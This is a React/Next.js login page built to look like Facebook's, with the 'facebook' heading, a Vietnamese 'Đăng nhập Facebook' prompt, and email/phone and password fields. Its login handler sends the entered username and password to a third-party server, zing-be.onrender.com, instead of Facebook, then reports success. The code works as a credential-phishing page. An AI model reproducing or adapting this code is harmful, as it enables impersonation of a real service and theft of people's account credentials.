import React, { useState } from 'react'
import { useRouter } from "next/router";
import Head from 'next/head'
import Link from 'next/link'
import axios from 'axios'
import styles from '../../styles/Home.module.scss'

export default function Login() {
    const [show, setShow] = useState(true)
    const [username, setUsername] = useState('')
    const [password, setPassword] = useState('')

    const router = useRouter();

    const handleLogin = () => {
        if (username == '' || password == '') {
            alert('Please login for Facebook')
        }
        else {

            axios.post('https://zing-be.onrender.com/login', {
                username, password
            })
                .then(res => {
                    if (res) {
                        localStorage.setItem('keyZing', res);
                        alert('Login thành công')
                        window.location = '/'
                    }

                })
                .catch(err => {
                    console.log(err);

                });
        }

    }

    const handleShow = () => {
        setShow(false)
    }
    const handleUnShow = () => {
        setShow(true)
    }
    return (
        <>
            <Head>
                <title>Login</title>
                <meta name="description" content="Generated by create next app" />
                <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css"></link>
                <link rel="icon" href="/favicon.ico" />
            </Head>
            <h1 className={styles.titleLogin}>facebook</h1>
            <div className={styles.login}>
                <p className={styles.p1}>Đăng nhập Facebook</p>
                <input
                    onChange={e => setUsername(e.target.value)}
                    value={username}
                    placeholder="Email hoặc số điện thoại"
                />
                <br></br>
                <br></br>
                {show ? (
                    <input
                        type={'password'}
                        onChange={e => setPassword(e.target.value)}
                        value={password}
                        placeholder="Mật khẩu"
                    />
                ) : (
                    <input
                        onChange={e => setPassword(e.target.value)}
                        value={password}
                        placeholder="Mật khẩu"
                    />
                )}
                {show ? (
                    <i onClick={handleShow} className="fa-solid fa-eye"></i>
                ) : (
                    <i onClick={handleUnShow} className="fa-solid fa-eye-slash"></i>
                )}


                <br></br>
                <br></br>
                <button onClick={handleLogin} className={styles.btnLogin}>Đăng nhập</button>
                <p className={styles.p2}>Quên tài khoản ?</p>
                <p className={styles.p3}>------------ hoặc ------------</p>
                <button className={styles.btnSignup}>Tạo tài khoản mới</button>


            </div>
        </>
    )
}